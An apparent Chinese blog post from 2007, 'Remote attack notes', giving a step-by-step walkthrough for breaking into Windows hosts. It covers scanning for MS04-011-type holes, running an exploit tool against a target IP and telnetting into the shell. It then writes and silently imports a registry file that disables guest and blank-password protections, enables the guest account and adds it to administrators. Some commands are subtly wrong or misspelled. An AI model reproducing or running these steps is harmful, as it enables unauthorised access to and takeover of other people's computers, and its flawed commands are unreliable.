远程攻击笔记
yoken
阅读:7631
2007-10-05 01:09:00
评论:3667
1、用你熟悉的扫描工具,查找主机是否有溢漏洞ms04011,ms0049...........等和他使用的操作系统。
2、用下载一个相应的溢出工具,我用ms04011.exe。在CMD下命令格式为:ms04011 0/1 IP(0:win2k 1:winxp)如果出现shellcode后停止不动,则表示下在溢出正在进行。
3、用telnet,格式为:telnet IP 端口。若登录到对方的c:\winnt/system32>则成功
4、反XP安全:用echo在对方c:\winnt/system32>下建立unxp.reg文件,内容为:Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]"forceguest"=dword:00000000"limitblankpassworduse"=dword:00000000用以下命令实现:echo Windows Registry Editor Version 5.00 >>unxp.regecho. >>unxp.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>unxp.regecho "forceguest"=dword:00000000 >>unxp.reg echo "limitblankpassworduse"=dword:00000000 >>unxp.regecho. >>unxp.reg建立完成后可用type显示其内容,核对无误。
5、用命令:regedit /s unxp.reg导入。
6、提升guest权限 命令:net use guest /active:yes 命令:net localgroup admnistrators guest /add 将guest加到administrators组。
7、此时远程登录成功查看了远程桌面并可查看全部磁盘文件。特别说明,这些方法并不是我的原创,我只是综合运用了网上那些高手写的文章中的方法。
转载保留链接!网址:http://80920140.com/post/23.html
声明
1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源; 2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任; 3.作者投稿可能会经我们编辑修改或补充。